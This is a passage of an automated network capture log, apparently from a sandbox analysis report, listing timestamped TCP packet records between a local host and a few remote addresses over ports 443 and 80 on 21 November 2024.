                                                                                                                                                                        Nov 21, 2024 10:38:51.413537979 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.413619041 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.413849115 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.413885117 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.413907051 CET50033443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.413913965 CET4435003313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.417265892 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.417300940 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.417388916 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.417582989 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.417597055 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.672508955 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.673109055 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.673136950 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:51.673546076 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:51.673552036 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.137114048 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.140238047 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.140407085 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.140438080 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.140507936 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.140599012 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.140642881 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.140660048 CET50034443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.140676022 CET4435003413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.143533945 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.143629074 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.143718958 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.143840075 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.143862009 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.225447893 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.225944996 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.225975990 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.226380110 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.226383924 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.669236898 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.672245979 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.673532963 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.673573017 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.673594952 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.673609018 CET50035443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.673614979 CET4435003513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.676588058 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.676625013 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.676733017 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.676872969 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.676879883 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.723155022 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.729990959 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.730021954 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.730460882 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.730467081 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.757713079 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.758224964 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.758296967 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:52.758670092 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:52.758687973 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.175326109 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.178163052 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.178241014 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.178277016 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.178277016 CET50036443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.178294897 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.178304911 CET4435003613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.181008101 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.181049109 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.181122065 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.181282043 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.181293011 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.196433067 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.196855068 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.196865082 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.197304964 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.197308064 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.341749907 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.344793081 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.344851971 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.344872952 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.344918013 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.344985008 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.345010042 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.345026970 CET50037443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.345035076 CET4435003713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.348488092 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.348524094 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.348800898 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.348800898 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.348825932 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.640706062 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.643831968 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.644042015 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.644076109 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.644090891 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.644150019 CET50038443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.644155025 CET4435003813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.646847010 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.646886110 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.646979094 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.647139072 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.647154093 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.719363928 CET4970580192.168.2.6199.232.210.172
                                                                                                                                                                        Nov 21, 2024 10:38:53.719389915 CET49703443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:38:53.719397068 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:38:53.840369940 CET8049705199.232.210.172192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.840406895 CET4434970820.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.840455055 CET4970580192.168.2.6199.232.210.172
                                                                                                                                                                        Nov 21, 2024 10:38:53.840467930 CET49708443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:38:53.840470076 CET4434970320.190.160.17192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.840517044 CET49703443192.168.2.620.190.160.17
                                                                                                                                                                        Nov 21, 2024 10:38:53.924413919 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.924957991 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.924997091 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:53.925410032 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:53.925421000 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.456763983 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.460079908 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.460167885 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.460166931 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.460218906 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.460272074 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.460299015 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.460316896 CET50039443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.460324049 CET4435003913.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.462855101 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.462898016 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.462982893 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.463123083 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.463136911 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.465279102 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.465665102 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.465675116 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.466119051 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.466134071 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.910887957 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.913649082 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.913785934 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.913849115 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.913861990 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.913872957 CET50040443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.913877964 CET4435004013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.917016983 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.917130947 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:54.917243004 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.917493105 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:54.917526960 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.033210993 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.033814907 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.033844948 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.034271002 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.034276962 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.129010916 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.129744053 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.129757881 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.130175114 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.130178928 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.427557945 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.428229094 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.428248882 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.428682089 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.428687096 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.484632969 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.487607002 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.487726927 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.487854004 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.487873077 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.487888098 CET50041443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.487894058 CET4435004113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.491487026 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.491583109 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.491710901 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.491990089 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.492028952 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.605057001 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.605123997 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.605590105 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.605590105 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.605711937 CET50042443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.605730057 CET4435004213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.609240055 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.609292030 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.609399080 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.609770060 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.609783888 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.872530937 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.876028061 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.876092911 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.876111984 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.876128912 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.876190901 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.876251936 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.876267910 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.876332998 CET50043443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.876338959 CET4435004313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.879570961 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.879610062 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:55.879712105 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.880070925 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:55.880085945 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.251916885 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.252516985 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.252531052 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.253159046 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.253164053 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.635504007 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.636183023 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.636219025 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.636755943 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.636763096 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.695774078 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.698898077 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.699078083 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.699078083 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.699078083 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.702260971 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.702291012 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:56.702359915 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.702559948 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:56.702564955 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.000138998 CET50044443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.000159025 CET4435004413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.069794893 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.069946051 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.069989920 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.069988966 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.070034981 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.070077896 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.070101976 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.070116997 CET50045443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.070123911 CET4435004513.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.073492050 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.073528051 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.073590994 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.073746920 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.073756933 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.340010881 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.340559006 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.340574026 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.340914965 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.340919018 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.393100977 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.393539906 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.393558979 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.394062042 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.394068003 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.782572985 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.783668041 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.783668041 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.783683062 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.783694983 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.793550014 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.793998957 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.794291973 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.794291973 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.794291973 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.797354937 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.797389030 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.797452927 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.797600031 CET50052443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.797610044 CET4435005213.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.837869883 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.841073990 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.841126919 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.841331005 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.841331959 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.841331959 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.841331959 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.843763113 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.843831062 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:57.843938112 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.844304085 CET50053443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:57.844332933 CET4435005313.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.109525919 CET50046443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.109549046 CET4435004613.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.156439066 CET50047443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.156496048 CET4435004713.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.235029936 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.238348007 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.238496065 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.238583088 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.238583088 CET50048443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.238601923 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.238611937 CET4435004813.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.241485119 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.241528988 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.241600037 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.241761923 CET50054443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.241775036 CET4435005413.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.492491007 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.493091106 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.493103981 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.493513107 CET50050443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.493519068 CET4435005013.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.919091940 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.919697046 CET50051443192.168.2.613.107.246.60
                                                                                                                                                                        Nov 21, 2024 10:38:58.919718981 CET4435005113.107.246.60192.168.2.6
                                                                                                                                                                        Nov 21, 2024 10:38:58.920160055 CET50051443192.168.2.613.107.246.60
